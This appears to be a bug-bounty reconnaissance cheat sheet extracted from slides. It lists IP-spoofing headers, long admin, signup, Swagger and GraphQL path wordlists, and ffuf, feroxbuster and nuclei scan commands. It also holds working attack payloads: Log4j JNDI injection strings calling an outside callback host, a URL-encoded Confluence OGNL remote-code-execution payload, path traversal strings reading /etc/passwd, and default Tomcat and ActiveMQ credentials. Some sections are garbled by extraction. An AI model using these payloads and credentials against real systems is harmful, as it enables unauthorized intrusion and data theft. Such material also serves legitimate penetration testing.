True-Client-IP
CF-Connecting-IP
X-Cluster-Client-IP
Fastly-Client-IP
X-Originating-IP
X-Remote-IP
X-Remote-Addr
X-Host
X-Forwarded-Host
X-Forwarded-By

┌──(mahmoud㉿mohamed)-[~]
└─$ sort -R BIG-Words.txt BIG-Words.EXT | ffuf -H 'X-Forwarded-Host: IPS -H 'X-Forwarded-For: IPS' -H
'X-Client-IP: IPS' -H 'X-Real-IP: IPS' -H 'True-Client-IP: IPS' -H 'X-Remote-IP: IPS' -H 'X-Remote-Addr: IPS'
-H 'Authorization: IPS' -D -e php -mode pitchfork -w ORG-IP.txt:IPS -w -:FUZZ Values.txt:KEY -mc all -ac
-u https://SUB.ROOT.TLD/FUZZ -of csv -o OUT-ffuf.csv
Attack Surface
2 - Admin Dashboards

feroxbuster

adminconsole-dashboard adminsystem adm/admin.html

controlpanel-dashboard.asp webmaster privateadmin/dashboard admin/dashboard.html
privateadmin.asp webmaster-dashboard.html admin-interface_dashboard cms_dashboard.asp
sysadmin-dashboard sysadmin_dashboard.aspx superuser/dashboard.aspx memberadmin-dashboard
panel/dashboard.html admin_section controlpanel-dashboard.aspx systemadmin_dashboard.html
cms/dashboard backendadmin_dashboard secureadmin-dashboard.php moderation_dashboard.html
admincp_dashboard.asp webadmin-dashboard secure/admin_dashboard.asp panel-dashboard.aspx
admin_login admincp-dashboard.php administrator.php admin-dashboard.html
admin-dashboard cms/dashboard.html moderator_dashboard.html staffadmin/dashboard.html
admintools adminarea/dashboard.html management_dashboard manager.aspx
adm/admin.aspx superuser.php controlpanel_dashboard.html panel_dashboard.php
admin/login.php memberadmin/dashboard.asp admincontrolpanel-dashboard.aspx admin123/dashboard.php
staffadmin-dashboard.html backendadmin-dashboard.aspx webmaster_dashboard admincontrol-dashboard
adm/admin.php cpanel admin_interface_dashboard.html management-dashboard.asp
control/panel.php secure_admin.aspx cp-dashboard.asp privateadmin_dashboard.php
privateadmin/dashboard.html adminarea-dashboard.aspx memberadmin/dashboard.aspx admincp/dashboard.php
managementsystem_dashboard.php privateadmin/dashboard.asp moderation/dashboard.php cp/dashboard.html
adminconsole_dashboard.html panel-dashboard.asp manage.asp dashboard.aspx
adminarea privateadmin-dashboard.html systemadmin-dashboard.html webmaster/dashboard.asp
cp_dashboard.asp moderator-dashboard.aspx admincontrol-dashboard.asp backendadmin-dashboard.php
managementsystem/dashboard.aspx admincontrol secure-admin.aspx controlpanel/dashboard.html
adminconsole/dashboard.html secure-admin.php controlpanel_dashboard.php memberadmin_dashboard.asp
privateadmin.html memberadmin/dashboard.html sitecontrol.html admin_login.html
superuser-dashboard.asp superuser_dashboard.asp admin.html root-dashboard.asp
secure/admin_dashboard management/dashboard.asp admin/interface_dashboard.aspx adm.aspx
admin/interface_dashboard.asp cp-dashboard.aspx cpanel.asp moderator/dashboard.html
managementsystem-dashboard.aspx webmaster_dashboard.html admin/login sysadmin/dashboard.asp
root/dashboard adminpanel-dashboard.aspx admincontrolpanel/dashboard.aspx adminsite.asp
sysadmin-dashboard.aspx admincontrolpanel/dashboard.asp admincp_dashboard panel_dashboard.aspx
admininterface secure_admin/dashboard admin-interface_dashboard.asp privateadmin
admin_console.php administrator.aspx adm.php adminportal_dashboard.asp
admin-section.aspx moderation_dashboard.aspx root_dashboard.asp sysadmin-dashboard.html
backendadmin_dashboard.aspx admincontrol.html admin-dashboard.asp admin123-dashboard.php
secureadmin_dashboard.aspx adminarea/dashboard.asp admincp_dashboard.aspx admin-interface_dashboard.html
cp/dashboard webmaster-dashboard staffadmin-dashboard.asp admin-home
admin_section.aspx admin_dashboard.asp admin-console moderator.php
root/dashboard.asp admin/login.html superuser_dashboard.php webmaster-dashboard.aspx
staffadmin.html cp-dashboard secure-admin_dashboard.html admincp_dashboard.html
adminconsole-dashboard.aspx siteadmin-dashboard.asp webmaster.html webmaster.aspx
admin/home cp admincontrol/dashboard secure/admin.aspx
superuser_dashboard.html management/dashboard admin/console.php moderation_dashboard
admin-login.asp siteadmin-dashboard.html adminsystem.html secure-admin.asp
webadmin-dashboard.asp admin/interface_dashboard managementsystem-dashboard.php manager
cpanel.php adminsite.html systemadmin_dashboard.php admin.asp
managementsystem-dashboard.html memberadmin_dashboard management/dashboard.aspx moderator.asp
moderator.aspx adm admin-login.aspx panel/dashboard.aspx
secureadmin_dashboard.php adminarea_dashboard.html adminsystem.asp secure_admin
adminarea_dashboard.php webadmin/dashboard.php adminsection/dashboard admin_login.asp
root-dashboard.html control-panel.php admin_console.html panel/dashboard.php
adm.asp adminhome controlpanel/dashboard.php privateadmin_dashboard.aspx
admincp/login.html admincontrolpanel_dashboard.aspx adminarea/admin.html admin_login.aspx
admin_section.asp admincontrolpanel adminsection/dashboard.php managementsystem/dashboard.asp
adminsite/admin.html adminsection_dashboard.asp moderation-dashboard.asp admin123/dashboard
privateadmin.php admin-interface_dashboard.php admin_interface_dashboard.asp adminsite/admin.aspx
moderation-dashboard.aspx sysadmin-dashboard.asp controlpanel_dashboard.aspx control-panel.html
cp_dashboard.aspx backendadmin.asp superuser-dashboard admin_console
panel_dashboard.asp admincontrolpanel/dashboard secure/admin_dashboard.html control/panel.html
moderator-dashboard webmaster.php moderator_dashboard.php adminportal-dashboard.aspx
backendadmin-dashboard root_dashboard.html webmaster.asp systemadmin/dashboard
sitecontrol.aspx cp-dashboard.html admincontrol_dashboard secure_admin.html
superuser_dashboard.aspx sitecontrol.php admincp-dashboard.html webadmin-dashboard.aspx
webadmin/dashboard adminpanel_dashboard.html cp/dashboard.php backendadmin/dashboard.aspx
root/dashboard.aspx controlpanel-dashboard.php user webadmin/dashboard.aspx
memberadmin-dashboard.html siteadmin_dashboard.html webmaster_dashboard.aspx secureadmin/dashboard.html
secureadmin/dashboard admin-console.php superuser.asp admin123_dashboard.php
moderator-dashboard.php admin-console.html management_dashboard.html controlpanel
moderator_dashboard adm/admin.asp admincp-dashboard.asp admins
adminsite/admin.asp webmaster/dashboard.php adminsite/login.php siteadmin_dashboard.asp
adm.html cmsadmin.asp secure-admin_dashboard.asp memberadmin-dashboard.php
webadmin_dashboard.aspx admin_dashboard staffadmin/dashboard.asp controlpanel/dashboard.aspx
panel-dashboard memberadmin.html admin_site managementsystem-dashboard
moderation-dashboard.html backendadmin-dashboard.asp memberadmin_dashboard.html adminarea_dashboard.aspx
adminconsole-dashboard.php system cp_dashboard.php admincontrol.aspx
admin/section.php control_panel.aspx superuser_dashboard moderator
privateadmin-dashboard moderation-dashboard admin/login.aspx admin/dashboard
adminsection/dashboard.aspx systemadmin/dashboard.asp admincp_dashboard.php admin/interface/dashboard
siteadmin-dashboard moderation/dashboard.html webadmin_dashboard adminsection-dashboard
webadmin_dashboard.html superuser.aspx staffadmin.asp cms-dashboard.aspx
sysadmin/dashboard.aspx systemadmin_dashboard.aspx admincontrolpanel_dashboard.asp webadmin_dashboard.php
webmaster_dashboard.asp dashboard.asp cp/dashboard.asp webmaster/dashboard.html
privateadmin.aspx cmsadmin.php cpanel.html staffadmin-dashboard
panel-dashboard.html adminarea_dashboard admincontrol-dashboard.aspx systemadmin-dashboard.php
root_dashboard.php admin_section.php admincp/dashboard adminsite.php
admin_interface_dashboard.aspx sysadmin_dashboard.html superuser cmsadmin.html
cms webadmin_dashboard.asp admin/section.html backendadmin
privateadmin_dashboard admin/interface_dashboard.php admin/portal adminarea-dashboard.php
panel/dashboard.asp moderator/dashboard.asp moderator/dashboard.aspx panel/dashboard
admin_dashboard.php admincp/dashboard.html control-panel adminarea-dashboard
staffadmin_dashboard adminportal-dashboard.asp secureadmin memberadmin.aspx
cms_dashboard.aspx admin_interface_dashboard.php backendadmin.aspx adminarea/admin.php
admincp/login.asp moderator-dashboard.html superuser-dashboard.html controlpanel_dashboard.asp
admin-section managementsystem_dashboard systemadmin_dashboard.asp admin-site
adminarea/dashboard.aspx cms-dashboard.php cms_dashboard sysadmin_dashboard.php
superuser-dashboard.php staffadmin_dashboard.asp adminsection/dashboard.html webmaster/dashboard.aspx
admin-login.html admincontrolpanel-dashboard.php moderation_dashboard.php adminportal_dashboard.aspx
adminarea-dashboard.asp adminsystem.php management_dashboard.asp sysadmin.php
secure_admin_dashboard.php privateadmin_dashboard.asp superuser/dashboard.html management/dashboard.html
memberadmin_dashboard.aspx sysadmin systemadmin-dashboard manager.php
secure_admin.php admin/section.aspx adminportal_dashboard moderation-dashboard.php
admincontrol/dashboard.asp privateadmin_dashboard.html privateadmin/dashboard.aspx adminarea_dashboard.asp
control root admin1 admin-dashboard.aspx
admincp/dashboard.asp secureadmin/dashboard.asp panel_dashboard.html management-dashboard.aspx
privateadmin-dashboard.asp admincp-dashboard adminpanel/dashboard.php siteadmin/dashboard.php
cp-dashboard.php privateadmin/dashboard.php management siteadmin/dashboard.aspx
adminpanel-dashboard.php moderator-dashboard.asp admin.aspx control/panel
admincp moderator/dashboard adminsection-dashboard.html sysadmin.asp
adminarea/dashboard siteadmin/dashboard sysadmin-dashboard.php administrator.asp
superuser/dashboard.php manager.html sysadmin_dashboard.asp cms_dashboard.html
managementsystem-dashboard.asp memberadmin secure/admin.html management-dashboard.html
adminsite/login.asp cms-dashboard superuser/dashboard secure/admin_dashboard.php
secureadmin_dashboard.html moderation/dashboard.aspx adminsection-dashboard.php admincontrolpanel/dashboard.php
memberadmin-dashboard.aspx secure_admin_dashboard.aspx superuser-dashboard.aspx adminportal/dashboard.asp
admin-interface/dashboard admin-section.php admin_interface/dashboard secure_admin.asp
adminportal_dashboard.php backendadmin.html adminsite/login.html admin-login.php
sysadmin/dashboard.php admin/dashboard.aspx managementsystem/dashboard root.php
admincontrolpanel-dashboard.html sysadmin.html adminsection_dashboard.php adminpanel-dashboard.asp
cp_dashboard.html secure_admin_dashboard.html admin123_dashboard adminconsole_dashboard
root.html backendadmin/dashboard.html admin_dashboard.aspx adminconsole-dashboard.html
panel_dashboard adminsite.aspx adminportal/dashboard.aspx manage/admin
cmsadmin.aspx admin_dashboard.html adminsystem.aspx root-dashboard.aspx
admincontrol-dashboard.html staffadmin-dashboard.aspx sitecontrol control/panel.aspx
adminpanel/dashboard.aspx cms/dashboard.asp admin_section.html systemadmin/dashboard.html
moderator_dashboard.asp admin/console controlpanel_dashboard memberadmin.asp
adminpanel_dashboard admin/site systemadmin-dashboard.asp memberadmin/dashboard.php
staffadmin.aspx sysadmin/dashboard.html webadmin/dashboard.asp control_panel
control-panel.asp controlpanel/dashboard webmaster-dashboard.asp sysadmin.aspx
admin_login.php admincp/login.php webmaster/dashboard backendadmin.php
admin-interface_dashboard.aspx admincontrol_dashboard.asp secure-admin adminarea.aspx
admincp/login.aspx admincontrol_dashboard.php moderator/dashboard.php admin/dashboard.asp
adminconsole/dashboard.aspx adminpanel-dashboard control_panel.asp adminportal/dashboard.html
secure-admin_dashboard.aspx dashboard webadmin/dashboard.html admincontrol.php
dashboard.html adminsite/admin.php memberadmin_dashboard.php admin-portal
cp/dashboard.aspx systemadmin/dashboard.aspx webadmin-dashboard.html adminpanel_dashboard.asp
secure/admin/dashboard managementsystem_dashboard.html secure-admin_dashboard.php admin-login
adminlogin admincontrol.asp management-dashboard staffadmin_dashboard.html
staffadmin.php systemadmin-dashboard.aspx admincontrol_dashboard.html siteadmin
moderation_dashboard.asp controlpanel-dashboard secure_admin_dashboard login
secureadmin_dashboard secureadmin-dashboard.aspx adminportal_dashboard.html adminpanel_dashboard.aspx
admincontrol/dashboard.html admincontrol/dashboard.aspx backendadmin/dashboard backendadmin/dashboard.asp
cms/dashboard.aspx adminarea/admin.asp adminpanel-dashboard.html adminsite
control-panel.aspx siteadmin/dashboard.html adminportal-dashboard adminsection/dashboard.asp
administrator.html adminconsole management_dashboard.aspx admin2
sysadmin_dashboard admin/interface_dashboard.html memberadmin-dashboard.asp admin_interface_dashboard
admin-section.asp adminarea/admin.aspx backendadmin_dashboard.php admin/dashboard.php
sitecontrol.asp admin/login.asp adminarea.asp manage
webadmin-dashboard.php root-dashboard.php webadmin admincontrol/dashboard.php
siteadmin-dashboard.aspx root/dashboard.php managementsystem/dashboard.html adminsection-dashboard.asp
staffadmin/dashboard.php adminportal/dashboard.php adminconsole/dashboard.asp staffadmin_dashboard.aspx
adminarea.php adminsection_dashboard.html adminconsole/dashboard controlpanel.html
adminportal-dashboard.php adminconsole-dashboard.asp admincontrol-dashboard.php privateadmin-dashboard.aspx
adminarea.html staffadmin privateadmin-dashboard.php managementsystem_dashboard.aspx
control_panel.html adminportal-dashboard.html adminarea/dashboard.php adminsection-dashboard.aspx
admin_home adminportal/dashboard cms/dashboard.php adminconsole_dashboard.asp
adminconsole/dashboard.php systemadmin secure/admin.php secureadmin-dashboard
controlpanel/dashboard.asp superuser.html root.asp secure_admin_dashboard.asp
root.aspx cmsadmin management/dashboard.php admin123-dashboard
manager.asp adminpanel/dashboard.html adminconsole_dashboard.php adminpanel/dashboard.asp
secure/admin_dashboard.aspx admin-dashboard.php admincontrolpanel_dashboard adminpanel
admin-section.html secureadmin/dashboard.php manage.aspx backendadmin/dashboard.php
admincontrolpanel-dashboard.asp administration controlpanel.asp panel-dashboard.php
moderation/dashboard sysadmin/dashboard memberadmin.php admincp-dashboard.aspx
adminsection_dashboard.aspx admincontrolpanel_dashboard.html staffadmin/dashboard.aspx systemadmin/dashboard.php
backendadmin_dashboard.asp controlpanel-dashboard.html adminsite/login.aspx webmaster-dashboard.php
cpanel.aspx admin/section admin.php backendadmin_dashboard.html
managementsystem_dashboard.asp controlpanel.aspx cms_dashboard.php backoffice
admin123 admincontrol_dashboard.aspx adminsection_dashboard secure-admin_dashboard
moderator_dashboard.aspx secure/admin.asp siteadmin-dashboard.php admincp/dashboard.aspx
secureadmin-dashboard.asp cms-dashboard.html admin/section.asp root_dashboard.aspx
siteadmin_dashboard.php secure/admin secure-admin/dashboard webmaster_dashboard.php
cms-dashboard.asp admincontrolpanel_dashboard.php administrator adminarea-dashboard.html
managementsystem/dashboard.php controlpanel.php adminpanel/dashboard superuser/dashboard.asp
moderation/dashboard.asp admin/console.html siteadmin_dashboard.aspx adminconsole_dashboard.aspx
cp_dashboard management_dashboard.php root-dashboard systemadmin_dashboard
staffadmin-dashboard.php control/panel.asp backendadmin-dashboard.html siteadmin_dashboard
memberadmin/dashboard adminpanel_dashboard.php admincontrolpanel/dashboard.html secureadmin/dashboard.aspx
moderator.html secure-admin.html siteadmin/dashboard.asp panel
dashboard.php backend root/dashboard.html manage.php
admin management-dashboard.php admincontrolpanel-dashboard manage.html
secureadmin_dashboard.asp admin_portal root_dashboard staffadmin/dashboard
secureadmin-dashboard.html staffadmin_dashboard.php control_panel.php

┌──(mahmoud㉿mohamed)-[~]
└─$ cat HTTP-subdomains.txt | feroxbuster --random-agent --methods GET,POST --headers
'X-Forwarded-For: 127.0.0.1' --timeout 20 --insecure --no-recursion --collect-backups --dont-extract-links
--add-slash --dont-filter --quiet --wordlist admin-PATHS.txt --stdin
Attack Surface
3 - Sign Up AND Registration

feroxbuster

users/signup.aspx create_account.html create_user.aspx

auth/register.aspx account_signup.html new_account.asp
sign_up.html signup_user.php account/sign_up.php
account_signup.php users/register auth/register.asp
register newuser/register.aspx register.aspx
register_account account/sign_up.aspx signup_new.aspx
signupform.php users/signup.php user/register.php
account_signup.asp signup_new.php createaccount.aspx
account/register.html
auth/signup.aspx signupform register/user.asp
signup.asp
users/signup.asp register/user.php sign_up_form.asp
registerform.aspx
account/register.asp user_registration.php auth/signup.asp
create_user.asp
new_user.aspx sign_up.php register_user.asp
user_signup.aspx
register.html user/sign_up user/register.html
newuser/signup.html
users/register.php user/sign_up.asp registration
users/signup
register_new.asp new_user.html sign_up.aspx
signup_user.asp
register_account.php auth/register registerform.html
register_page
signup_user.aspx users/register.html account_register
register.php
sign_up registerform.asp user_signup.php
user/sign_up.aspx
account/sign_up.asp signup_new.html user_signup
create_account
user_signup.asp signup_page sign_up.asp
auth/register.html
sign_up_form.html auth/signup.html signupform.html
users/signup.html
account/signup.html user_registration.html account/register.aspx
signup.php
register_new users/register.asp register_user
user/signup
register_new.aspx account/register createaccount.html
users/sign_up.aspx
register_account.html user/signup.aspx registration.php
register_page.php
newuser/signup.asp account_signup.aspx signupform.aspx
user/register.asp
register_new.html register_page.asp create_user.php
newuser/signup.aspx
newuser/register.html users/sign_up.php account/signup.asp
account_register.asp
registerform register/user.aspx register/user.html
users/register.aspx
auth/signup user/sign_up.php register_new.php
create_account.aspx
account_register.aspx register_user.html create_account.asp
registration.html
register_page.aspx auth/register.php new_user.php
users/sign_up
signup_page.php signup_page.asp registration.asp
signup.html
register_user.aspx registerform.php new_user
signup
account_signup user_registration.aspx createaccount.asp
newuser/register.php
signup_page.aspx account_register.html account/signup
user/signup.asp
signup_new signup.aspx user_registration.asp
new_account
create_user users/sign_up.asp new_account.html
user_signup.html
register_user.php newuser/signup.php createaccount.php
register_page.html
user/signup.php sign_up_form newuser/register
create_user.html
register_account.aspx account/register.php signupform.asp
user/signup.html
register/user users/sign_up.html signup_user.html
user/register.aspx
user/register account_register.php sign_up_form.aspx
newuser/register.asp createaccount signup_page.html
signup_new.asp user/sign_up.html account/sign_up
registration.aspx user_registration new_account.php
auth/signup.php new_user.asp signup_user
new_account.aspx create_account.php sign_up_form.php
newuser/signup register_account.asp account/sign_up.html
account/signup.aspx account/signup.php register.asp

┌──(mahmoud㉿mohamed)-[~]
└─$ cat HTTP-subdomains.txt | feroxbuster --random-agent --methods GET,POST --headers
'X-Forwarded-For: 127.0.0.1' --timeout 20 --insecure --no-recursion --collect-backups --dont-extract-links
--add-slash --dont-filter --quiet --wordlist signup-PATHS.txt --stdin
Attack Surface
4 - Too Large Redirect Response Body

Burpsuite Bambdas

return requestResponse.hasResponse() &&

requestResponse.response().statusCode() <= 399 &&
requestResponse.response().statusCode() >= 300 &&
requestResponse.response().body().length() > 1000;

Change 302 Moved Temporarily To 200 OK

Remove Location Header
Remove Redirect Code
Attack Surface
5 - IIS

.aspx
ASP.NET_Sessionid
.asp
ASPSESSION
Elmah.axd .axd
X-AspNet-Version
Trace.axd .ashx
X-Powered-By: ASP.NET
.wsdl
_VIEWSTATE
.wadl
.asmx
.xml
Microsoft-HTTPAPI/2.0 .zip

Telerik.Web.UI.WebResource.axd?type=rau
Telerik.Web.UI.WebResource.axd?type=r%61u
Telerik.Web.UI.DialogHandler.aspx

Location: ([0-9]{1,3}[\.]){3}[0-9]{1,3}
GET / HTTP/1.0
Accept: */*

GET / HTTP/1.0
Host:
Accept: */*

DIR::$INDEX_ALLOCATION/File.EXT
DIR:$i30:$INDEX_ALLOCATION/File.EXT
D/(S(X))IR/(S(X))/File.EXT

DIR/..%2fFUZZ

┌──(mahmoud㉿mohamed)-[~]
└─$ sns --silent –check --file HTTP-subdomains.txt

nuclei

swagger/v1/swagger.json
api/v2/index.html
api/static/swagger-ui.html
api/swagger
api/apidocs/swagger.json api/v1/swagger-ui.html
api-docs/swagger.yaml swagger/v1/index.html
spec/index.html api/api-docs/swagger.yaml
api-docs/swagger.json docs/swagger-ui.html
_swagger_/ api/swagger/static/index.html
api/api-docs api/doc.json
docs/index.html api/doc
v1/api/swagger-ui.html api/swagger-ui/api-docs
apidocs/swagger-ui.html index.html
api/swagger-ui/swagger.yaml api/swagger.yml
swagger-resources/restservices/v2/api-docs/swagger-ui.html
swagger-ui.js
swagger/v2/index.html
api/swagger-resources swagger/v1/swagger.yaml
api/v1/swagger-ui/swagger.json __swagger__/swagger-ui.html
api/v2/swagger-ui.html swagger-ui/swagger-ui.html
swagger-ui/index.html api/static/index.html
api/v1/index.html api/__swagger__/
swagger/swagger-ui.js api-docs/index.html
api/swagger/index.html swagger/index.html
swagger/v1/swagger-ui.html api/apidocs/swagger.yaml
swagger-resources/restservices/v2/api-docs swagger
swagger-ui.html api/swagger.yaml
api/swagger/swagger-ui.html
swagger/ui/swagger-ui.js
v1/api/index.html
api/docs/ api/swagger.json
__swagger__/index.html api-docs/swagger-ui.html
swagger/v2/swagger-ui.html __swagger__/
api/spec/swagger.json api_docs
api/swagger_doc.json api/index.html
swagger/swagger-ui.html docu
spec/swagger-ui.html swagger/ui/index
swagger-ui/swagger-ui.js api/api-docs/swagger.json
api/static/swagger-ui/swagger-ui.html swagger/v2/swagger.json
docs swagger/v2/swagger.yaml
api/swagger-ui.html
swagger/v1/api-docs
api/swagger/ui/index
swagger-resources/restservices/v2/api-docs/index.html swagger/v2/api-docs
api/v1/swagger-ui/swagger.yaml swagger/api-docs
api/spec/swagger.yaml v2/api-docs
swagger.json v1/api-docs
api-doc api-docs
api/swagger-resources/restservices/v2/api-docs api/v1/swagger.json
api/apidocs api/v1/swagger.yaml
api/_swagger_/ api/v2/swagger.json
swagger.yaml api/v2/swagger.yaml
apidocs/index.html api/docs
api/static/swagger-ui/index.html
static/api/swagger.json
api/swagger-ui/swagger.json
static/api/swagger.yaml

┌──(mahmoud㉿mohamed)-[~]
└─$ cat HTTP-subdomains.txt | nuclei -disable-clustering -scan-strategy template-spray
-bulk-size 300 -concurrency 1 -retries 3 -timeout 15 -silent -no-color -disable-update-check
stats -templates swaggerAPI.yaml -markdown-export BUGS | tee -a BUGS.txt
Attack Surface
7 - GraphQL Detection

v1
HyperGraphQL v3
v1/altair
___graphql v3/altair
v1/api/graphql
altair v3/api/graphql
v1/explorer
api/cask/graphql-playground v3/explorer
v1/graph
api/graphql v3/graph
v1/graphiql
api/graphql/v1 v3/graphiql
v1/graphiql.css
explorer v3/graphiql.css
v1/graphiql.js
express-graphql v3/graphiql.js
v1/graphiql.min.css
gql v3/graphiql.min.css
v1/graphiql.min.js
graph v3/graphiql.min.js
v1/graphiql.php
graph_cms v3/graphiql.php
v1/graphiql/finland
graphiql v3/graphiql/finland
v1/graphql
graphiql.css v3/graphql
v1/graphql-explorer
graphiql.js v3/graphql-explorer
v1/graphql.php
graphiql.min.css v3/graphql.php
v1/graphql/console
graphiql.min.js v3/graphql/console
v1/graphql/schema.json
graphiql.php v3/graphql/schema.json
v1/graphql/schema.xml
graphiql/finland v3/graphql/schema.xml
v1/graphql/schema.yaml
graphql v3/graphql/schema.yaml
v1/playground
graphql-console v3/playground
v1/subscriptions
graphql-devtools v3/subscriptions
v2
graphql-explorer v4/altair
v2/altair
graphql-playground v4/api/graphql
v2/api/graphql
graphql-playground-html v4/explorer
v2/explorer
graphql.php v4/graph
v2/graph
graphql/console v4/graphiql
v2/graphiql
graphql/graphql-playground v4/graphiql.css
v2/graphiql.css
graphql/schema.json v4/graphiql.js
v2/graphiql.js
graphql/schema.xml v4/graphiql.min.css
v2/graphiql.min.css
graphql/schema.yaml v4/graphiql.min.js
v2/graphiql.min.js
graphql/v1 v4/graphiql.php
v2/graphiql.php
je/graphql v4/graphiql/finland
v2/graphiql/finland
laravel-graphql-playground v4/graphql
v2/graphql
playground v4/graphql-explorer
v2/graphql-explorer
portal-graphql v4/graphql.php
v2/graphql.php
query v4/graphql/console
v2/graphql/console
query-api v4/graphql/schema.json
v2/graphql/schema.json
query-explorer v4/graphql/schema.xml
v2/graphql/schema.xml
query-laravel v4/graphql/schema.yaml
v2/graphql/schema.yaml
sphinx-graphiql v4/playground
v2/playground
subscriptions v4/subscriptions
v2/subscriptions

{"query": "query{typename}"} query=query{typename}

{"query": "query {
__schema __type (name:"OBJECT") {
{"query": "query { name
__sCHema
__schema { kind
__schema%20 fields { debug=1
types { name
__schema%0d debug=True
name type {
__schema%0a name verbose=1
} kind
__schema%ff verbose=True
} }
__schema? }
}"} }
__schema\ }"}
Attack Surface
8 - Common CVE and Misconfiguration

Apache Reverse Proxy Misconfiguration

GET http://www.google.com/ HTTP/1.1

Host: SUB.ROOT.COM

GET https://www.google.com/ HTTP/1.1

Host: SUB.ROOT.COM
Attack Surface
8 - Common CVE and Misconfiguration

Apache Log4j

${jndi:ldap://${sys:java.version}.BURP}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://BURP}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://BURP}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://BURP}
${jnd${upper:ı}:ldap://BURP}
${jnd${sys:SYS_NAME:-i}:ldap:/BURP}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://BURP}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://BURP}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://BURP}
${\u006a\u006e\u0064\u0069:ldap://BURP}
${jndi:ldap://127.0.0.1#BURP}
${${::-${::-$${::-j}}}}
Attack Surface
8 - Common CVE and Misconfiguration

PUT Method Enabled

POST /POC.txt HTTP/1.1

PUT /POC.txt HTTP/1.1
Host: SUB.ROOT.COM
Host: SUB.ROOT.COM
Content-Length: 8
Content-Length: 8
Content-Type text/plain
Content-Type text/plain
X-HTTP-Method-Override: PUT
MY POC
MY POC

AWS Cognito

identityPoolId
cognitoIdentityPoolId
userPoolWebClientId
userPoolId
aws_user_pools_id
Attack Surface
8 - Common CVE and Misconfiguration

Path Traversal

../../../../../etc/passwd
/////../../../../../etc/passwd
//////////../../../../../etc/passwd
..\..\..\..\..\c:\WINDOWS\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\\..\\..\\..\\..\\c:\\WINDOWS\\win.ini
..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini

┌──(mahmoud㉿mohamed)-[~]
└─$ curl --path-as-is https://SUB.ROOT.TLD/../../../../etc/passwd
Attack Surface
7 - Common CVE and Misconfiguration

ActiveMQ

User: admin
Authorization: Basic YWRtaW46YWRtaW4=
Pass: admin

admin
admin/browse.jsp?JMSDestination=event
admin/index.jsp?printable=true
Port 8161
admin/test/systemProperties.jsp
api/jolokia/list
api/jolokia/

Adminer

adminer
adminer.php
adminer-4.7.8.php
admin/adminer.php

Apache Airflow

api/v1/version
rest_api/api?api=version Airflow 404 = lots of circles
rest_api/api/v1.0/version
admin/rest_api/api?api=version
admin/rest_api/api/v1.0/version Set-Cookie: .*=eyJ
login
airflow/login
admin/airflow/login
Attack Surface
7 - Common CVE and Misconfiguration

Apache Struts
Struts 2

showcase.action
viewSource.action
.do
debug=command
.go
showcase/
.action
struts/webconsole.html
struts2-showcase/struts/utils.js

title:"Showcase"
title:"Struts2 Showcase"
title:"Struts2 jQuery Plugin Showcase"
body:"/struts/utils.js"

AJ-Report , Apache Druid , Apache API Six , October etc

dataSetParam/verification;swagger-ui
druid/indexer/v1/sampler
cas/login
apisix/admin/routes
apisix/admin/migrate/export
apisix/admin/migrate/import
Jsonrpc
Remote_agent.php
Install.php
admin/moduleinterface.php
backend/backend/auth/signin
Backend
jeecg-boot/jmreport/list
Attack Surface
7 - Common CVE and Misconfiguration

Apache Tomcat

ApacheTomcatScanner

User: tomcat User: tomcat

Pass: s3cret Pass: tomcat

manager/html
..%3B/manager/html
xx/..%3B/manager/html
%3B/..%3B/manager/html Port 8080
manager/x/..;/html
manager;X=Y/html
host-manager/html
..%3B/host-manager/html Apache Tomcat
xx/..%3B/host-manager/html
%3B/..%3B/host-manager/html
host-manager/x/..%3B/html
host-manager;X=Y/html FUZZ.jsp%01
manager/status
..%3B/manager/status
xx/..%3B/manager/status
%3B/..%3B/manager/status
manager/x/..;/status
manager;X=Y/status
manager/text
..%3B/manager/text
xx/..%3B/manager/text
%3B/..%3B/manager/text
manager/x/..;/text
manager;X=Y/text
WEB-INF/web.xml
./WEB-INF/web.xml
.//WEB-INF/web.xml
docs/introduction.html
examples/servlets
Attack Surface
7 - Common CVE and Misconfiguration

Drupal

CHANGELOG.txt

rest
admin/config/development/configuration/single/import
user/register

node/FUZZ e.g. 1 , 01 , 001 , 2 , 02 , 002 , 3 , 03 , 003 To e.g. 1000

Werkzeug

Server: Werkzeug

Interactive console

console
console;
console%A0
x/..;/console
Attack Surface
7 - Common CVE and Misconfiguration

Adobe ColdFusion

CFIDE/install.cfm
CFIDE/administrator/enter.cfm
CFIDE/administrator/archives/index.cfm
CFIDE/administrator/entman/index.cfm
CFIDE/wizards/common/_logintowizard.cfm
CFIDE/administrator/enter.cfm
flex2gateway/amf
CFIDE/administrator
cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc
cfide/adminapi/accessmanager.cfc
CFIDE/debug/cf_debugFr.cfm
CFIDE/wizards/common/utils.cfc

Couchdb

_utils/
_users/org.couchdb.user:USER
_config/query_servers/cmd
_membership

Django

admin/

Page not found AND DEBUG = True

http.title:"DisallowedHost at /"
Attack Surface
7 - Common CVE and Misconfiguration

Confluence

X-Atlassian-Token: no-check

rest/tinymce/1/macro/preview
pages/doenterpagevariables.action
pages/createpage-entervariables.action
pages/createpage.action
template/aui/text-inline.vm

%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40t
oString%28%40java.lang.Runtime%40getRuntime%28%29.exec
%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%2
9%29.%28%40com.opensymphony.webwork.ServletActionCont
ext%40getResponse%28%29.setHeader%28%22X-Cmd-Respon
se%22%2C%23a%29%29%7D

server-info.action?bootstrapStatusProvider.applicationConfig.s
etupComplete=false

setup/setupadministrator.action

setup/finishsetup.action
Attack Surface
7 - Common CVE and Misconfiguration

Zabbix

zabbix.php
zabbix/zabbix.php
zabbix.php?action=dashboard.list
zabbix/zabbix.php?action=dashboard.list
api_jsonrpc.php
zabbix/api_jsonrpc.php

Jenkins

x-jenkins

script
script/
script;
script%A0
asynchPeople
configureSecurity
configure
securityrealm/user/admin/
securityRealm/user/admin/search/index?q=a

Django

admin/

